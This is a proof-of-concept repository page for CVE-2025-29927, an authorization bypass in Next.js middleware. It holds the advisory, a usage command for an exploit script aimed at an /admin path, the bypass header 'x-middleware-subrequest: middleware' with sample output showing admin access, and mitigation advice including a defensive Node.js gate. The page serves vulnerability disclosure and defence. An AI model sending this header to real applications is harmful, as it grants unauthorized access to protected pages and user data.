
CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
Associated Vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
Here is a simple but effective exploit for CVE-2025-29927.
Readme
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)

This repository contains a Proof of Concept (PoC) exploit for **CVE-2025-29927**, a critical vulnerability in **Next.js** that allows attackers to bypass authorization checks by abusing a middleware-specific HTTP header.

---

## Overview

- **CVE ID:** CVE-2025-29927  
- **Severity:** Critical (CVSS 9.1)  
- **Affected Framework:** [Next.js](https://nextjs.org/)  
- **Vulnerability Type:** Authorization Bypass  
- **Exploitation Vector:** HTTP Request Header  
- **Exploit Complexity:** Low  
- **Authentication Required:** No  

---

## About the Vulnerability

Next.js applications often rely on middleware for authorization and access control. This CVE arises from a logic flaw in how the `x-middleware-subrequest` header is processed. When this header is set to `middleware`, the server may incorrectly assume the request originated from internal logic and **bypass middleware-based auth**.

> This can allow attackers to access admin panels, protected APIs, or user data — with **no credentials or valid session.**

---

## PoC Exploit

We provide a simple Python script to test whether a Next.js application is vulnerable.

### ▶️ Usage

```bash
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
```

## Sample Output
```
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
```

## Dependencies

- Python 3.6+
- requests library

## Mitigation

- Upgrade to the latest patched version of Next.js.
- Avoid using x-middleware-subrequest as a trust signal.
- Implement server-side session validation and proper authorization checks in protected routes.
- Consider adding WAF/IDS rules to block or flag suspicious use of this header.

WAF Logic: 

```
if header 'x-middleware-subrequest' == 'middleware':
    block_request()
```
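The pseudocode above only matches the single value `middleware`; the advisory text at the top of this page recommends rejecting any external request that carries the header at all. The following Node.js gate is an added defensive example, not code from the PoC repository or from Next.js, and it keys on the header's presence regardless of value; its placement in front of the Next.js server and the `forward`/`log` hooks are assumptions.

```javascript
// Added defensive example, not code from the PoC repository or from Next.js.
// Rejects any external request carrying x-middleware-subrequest, whatever its
// value, which is what the advisory recommends when patching is not yet possible.
const BLOCKED_HEADER = 'x-middleware-subrequest';

// True if the header is present under any letter-casing. Node lowercases incoming
// header names, but header maps handed over by a proxy or WAF layer may not.
function hasMiddlewareSubrequestHeader(headers) {
  return Object.keys(headers || {}).some(
    (name) => name.toLowerCase() === BLOCKED_HEADER,
  );
}

// Decision helper: a 403 verdict for flagged requests, null for clean ones.
function screenRequest(headers) {
  if (hasMiddlewareSubrequestHeader(headers)) {
    return { status: 403, reason: `external ${BLOCKED_HEADER} header` };
  }
  return null;
}

// Edge-side gate placed in front of the Next.js server (assumed deployment):
// flagged requests are answered here and never forwarded; clean ones go to
// `forward`, which stands in for the proxy hop to Next.js. `log` receives one
// record per blocked request so a WAF/IDS can alert on it.
function createGate(forward, log = () => {}) {
  return (req, res) => {
    const verdict = screenRequest(req.headers);
    if (verdict) {
      log({ method: req.method, url: req.url, reason: verdict.reason });
      res.writeHead(verdict.status, { 'content-type': 'text/plain' });
      res.end('Forbidden');
      return;
    }
    forward(req, res);
  };
}

// Constructed sample requests (not real traffic) run through the gate: one clean
// request to /admin and one carrying the header value the PoC above sends.
function demo() {
  const blocked = [];
  const forwarded = [];
  const gate = createGate((req) => forwarded.push(req.url), (rec) => blocked.push(rec));
  const fakeRes = () => ({ writeHead() {}, end() {} });
  gate({ method: 'GET', url: '/admin', headers: { host: 'app.example' } }, fakeRes());
  gate({ method: 'GET', url: '/admin',
         headers: { host: 'app.example', 'x-middleware-subrequest': 'middleware' } }, fakeRes());
  return { blocked, forwarded };
}
```

Pair the gate with an upgrade to a fixed release; stripping the header at the edge is a stopgap, not a replacement for the patch.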

## Disclosure & Credits

This PoC was developed by the Offensive Security Team at W2H Corp. as part of our continuous vulnerability research efforts. The original post for the CVE explanation is [here](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware).

File Snapshot

```
[4.0K] /data/pocs/c5f406cd5b7c2d9496742470a691b5cd0bede627
├── [1.4K] cve-2025-29927-poc.py
└── [2.3K] README.md

0 directories, 2 files
```